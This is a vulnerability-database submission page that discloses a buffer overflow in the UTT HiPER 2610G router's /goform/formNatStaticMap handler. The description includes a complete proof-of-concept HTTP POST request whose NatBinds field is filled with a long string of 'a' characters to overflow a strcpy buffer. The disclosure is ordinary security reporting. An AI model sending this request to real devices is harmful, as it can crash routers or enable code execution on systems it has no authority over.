提交 #836275: TUU HiPER 2610G <=v3.0.0-171107 Buffer Overflow信息

标题	TUU HiPER 2610G <=v3.0.0-171107 Buffer Overflow
描述	A critical overflow vulnerability exists in the UTT HiPER 2610G version v3.0.0-171107 router. By controlling parameters, attackers can send malicious HTTP post packets through the path /goform/formNatStaticMap to cause denial-of-service attacks and even arbitrary code execution, specifically through strcpy((char )(InstPointByIndex + 232), s1_1); POST /goform/formNatStaticMap HTTP/1.1 Host: 192.168.1.1 Content-Length: 1822 Cache-Control: max-age=0 Authorization: Digest username="admin", realm="UTT", nonce="80758026511f147977ce8ea9363e038c", uri="/goform/formArpBindGlobalConfig", algorithm=MD5, response="3c90b3b4d198905f88cf1301ff8ad6b5", opaque="5ccc069c403ebaf9f0171e9517f40e41", qop=auth, nc=000001a1, cnonce="71e33390dc75c484" Origin: http://192.168.1.1 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.1/IPMac.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: language=zhcn; utt_bw_rdevType=; td_cookie=2522114788 Connection: close NatBinds=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
来源	⚠️ https://github.com/HungryGoogle/log_attack/tree/main/index1
用户	liwenqing (UID 92587)
提交	2026-05-24 00時15分 (16 日前)
管理	2026-06-07 17時57分 (15 days later)
状态	已接受
VulDB条目	369136 [UTT HiPER 2610G 直到 3.0.0-171107 /goform/formNatStaticMap strcpy NatBinds 内存损坏]
积分	20

◂ 上一步一览下一步 ▸

Interested in the pricing of exploits?

See the underground prices here!